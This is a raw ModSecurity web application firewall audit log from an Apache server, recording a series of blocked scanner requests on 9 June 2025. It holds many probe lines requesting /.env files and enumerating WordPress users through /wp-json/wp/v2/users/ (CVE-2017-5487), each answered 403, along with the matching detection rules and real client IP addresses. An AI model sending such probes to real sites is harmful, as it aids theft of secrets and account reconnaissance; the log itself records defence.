combined=1416, p1=504, p2=881, p3=0, p4=0, p5=31, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c1f0011-Z-- --489f7d65-A-- [09/Jun/2025:08:08:45 +0700] aEY0HRMDIkuu7kMwm-B-AwAAAIE 103.236.140.4 39738 103.236.140.4 8181 --489f7d65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.254.186.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.254.186.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --489f7d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --489f7d65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749431325698554 2924 (- - -) Stopwatch2: 1749431325698554 2924; combined=1353, p1=457, p2=862, p3=0, p4=0, p5=34, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --489f7d65-Z-- --cd780074-A-- [09/Jun/2025:08:23:00 +0700] aEY3dGIgvuFVSPOFHr-L_AAAAE0 103.236.140.4 55554 103.236.140.4 8181 --cd780074-B-- GET /protected/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --cd780074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd780074-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749432180067847 857 (- - -) Stopwatch2: 1749432180067847 857; combined=309, p1=269, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd780074-Z-- --0961fd02-A-- [09/Jun/2025:08:32:06 +0700] aEY5lmIgvuFVSPOFHr-ShwAAAEU 103.236.140.4 55432 103.236.140.4 8181 --0961fd02-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.239.116.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.239.116.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0961fd02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0961fd02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749432726130522 3282 (- - -) Stopwatch2: 1749432726130522 3282; combined=1335, p1=478, p2=817, p3=0, p4=0, p5=39, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0961fd02-Z-- --ea524f6d-A-- [09/Jun/2025:08:41:06 +0700] aEY7sq6OGK25CtJ36rOLOQAAAAY 103.236.140.4 54830 103.236.140.4 8181 --ea524f6d-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Accept-Charset: utf-8 --ea524f6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea524f6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749433266353589 805 (- - -) Stopwatch2: 1749433266353589 805; combined=362, p1=318, p2=0, p3=0, p4=0, p5=44, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea524f6d-Z-- --1556c52e-A-- [09/Jun/2025:09:07:45 +0700] aEZB8a6OGK25CtJ36rOiJAAAAAU 103.236.140.4 50830 103.236.140.4 8181 --1556c52e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.247.231.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.247.231.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1556c52e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1556c52e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749434865709276 2533 (- - -) Stopwatch2: 1749434865709276 2533; combined=1045, p1=330, p2=688, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1556c52e-Z-- --4c8a8c4d-A-- [09/Jun/2025:09:35:21 +0700] aEZIaa6OGK25CtJ36rO7dwAAAAY 103.236.140.4 51000 103.236.140.4 8181 --4c8a8c4d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4c8a8c4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8a8c4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749436521269009 565 (- - -) Stopwatch2: 1749436521269009 565; combined=253, p1=227, p2=0, p3=0, p4=0, p5=25, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8a8c4d-Z-- --115dbb69-A-- [09/Jun/2025:09:46:00 +0700] aEZK6E2r5gN9oSasJQxnVwAAAMQ 103.236.140.4 55162 103.236.140.4 8181 --115dbb69-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept-Charset: utf-8 --115dbb69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --115dbb69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749437160030022 901 (- - -) Stopwatch2: 1749437160030022 901; combined=424, p1=385, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --115dbb69-Z-- --207ad556-A-- [09/Jun/2025:09:59:13 +0700] aEZOAU2r5gN9oSasJQxxIQAAAMU 103.236.140.4 38778 103.236.140.4 8181 --207ad556-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.162.60.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.162.60.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --207ad556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --207ad556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749437953858014 2674 (- - -) Stopwatch2: 1749437953858014 2674; combined=1123, p1=390, p2=703, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --207ad556-Z-- --c34f0d33-A-- [09/Jun/2025:10:18:51 +0700] aEZSm66OGK25CtJ36rPfsQAAAAQ 103.236.140.4 42644 103.236.140.4 8181 --c34f0d33-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.128.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.128.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c34f0d33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c34f0d33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749439131740757 4060 (- - -) Stopwatch2: 1749439131740757 4060; combined=2081, p1=602, p2=1443, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c34f0d33-Z-- --48914b5c-A-- [09/Jun/2025:10:37:55 +0700] aEZXE02r5gN9oSasJQyLuAAAAMc 103.236.140.4 48750 103.236.140.4 8181 --48914b5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; CAM-L23) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --48914b5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48914b5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749440275254585 888 (- - -) Stopwatch2: 1749440275254585 888; combined=425, p1=388, p2=0, p3=0, p4=0, p5=37, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48914b5c-Z-- --18a5e917-A-- [09/Jun/2025:10:49:07 +0700] aEZZs02r5gN9oSasJQyVPgAAAM0 103.236.140.4 53862 103.236.140.4 8181 --18a5e917-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 Accept-Charset: utf-8 --18a5e917-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a5e917-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749440947532040 937 (- - -) Stopwatch2: 1749440947532040 937; combined=432, p1=388, p2=0, p3=0, p4=0, p5=44, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a5e917-Z-- --8a4f8063-A-- [09/Jun/2025:11:00:58 +0700] aEZcek2r5gN9oSasJQydBAAAAM0 103.236.140.4 33022 103.236.140.4 8181 --8a4f8063-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 142.93.0.66 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --8a4f8063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a4f8063-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749441658958333 899 (- - -) Stopwatch2: 1749441658958333 899; combined=387, p1=328, p2=0, p3=0, p4=0, p5=58, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a4f8063-Z-- --b395283e-A-- [09/Jun/2025:11:07:27 +0700] aEZd_02r5gN9oSasJQyg7AAAAMs 103.236.140.4 52576 103.236.140.4 8181 --b395283e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.47.66.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.47.66.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b395283e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b395283e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749442047923152 2501 (- - -) Stopwatch2: 1749442047923152 2501; combined=1277, p1=437, p2=810, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b395283e-Z-- --1f8a9c12-A-- [09/Jun/2025:11:22:20 +0700] aEZhfGIgvuFVSPOFHr8JMAAAAFU 103.236.140.4 45718 103.236.140.4 8181 --1f8a9c12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en; rv:1.9.2.28) Gecko/20120308 Camino/2.1.2 (like Firefox/3.6.28) Accept-Charset: utf-8 --1f8a9c12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f8a9c12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749442940754733 882 (- - -) Stopwatch2: 1749442940754733 882; combined=374, p1=332, p2=0, p3=0, p4=0, p5=42, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f8a9c12-Z-- --752d1977-A-- [09/Jun/2025:11:41:56 +0700] aEZmFE2r5gN9oSasJQyldwAAAMQ 103.236.140.4 45906 103.236.140.4 8181 --752d1977-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 UBrowser/5.6.13705.206 Safari/537.36 Accept-Charset: utf-8 --752d1977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --752d1977-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749444116461351 917 (- - -) Stopwatch2: 1749444116461351 917; combined=360, p1=320, p2=0, p3=0, p4=0, p5=40, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --752d1977-Z-- --87110236-A-- [09/Jun/2025:11:50:07 +0700] aEZn_2IgvuFVSPOFHr8JNwAAAFc 103.236.140.4 45938 103.236.140.4 8181 --87110236-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 188.225.40.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 188.225.40.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --87110236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87110236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749444607662886 2386 (- - -) Stopwatch2: 1749444607662886 2386; combined=1119, p1=361, p2=726, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87110236-Z-- --b1e2d117-A-- [09/Jun/2025:11:50:49 +0700] aEZoKWIgvuFVSPOFHr8JSAAAAEg 103.236.140.4 46124 103.236.140.4 8181 --b1e2d117-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.81.24.74 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b1e2d117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1e2d117-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749444649414294 756 (- - -) Stopwatch2: 1749444649414294 756; combined=276, p1=240, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1e2d117-Z-- --e7bc8345-A-- [09/Jun/2025:11:52:41 +0700] aEZoma6OGK25CtJ36rMPCAAAAAc 103.236.140.4 46456 103.236.140.4 8181 --e7bc8345-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15 Accept-Charset: utf-8 --e7bc8345-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7bc8345-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749444761058769 808 (- - -) Stopwatch2: 1749444761058769 808; combined=351, p1=251, p2=0, p3=0, p4=0, p5=100, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7bc8345-Z-- --02777e1c-A-- [09/Jun/2025:12:09:01 +0700] aEZsba6OGK25CtJ36rMPpgAAAAE 103.236.140.4 47058 103.236.140.4 8181 --02777e1c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.90.111 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.90.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --02777e1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02777e1c-H-- Message: Access denied with code 403 (phase 1). 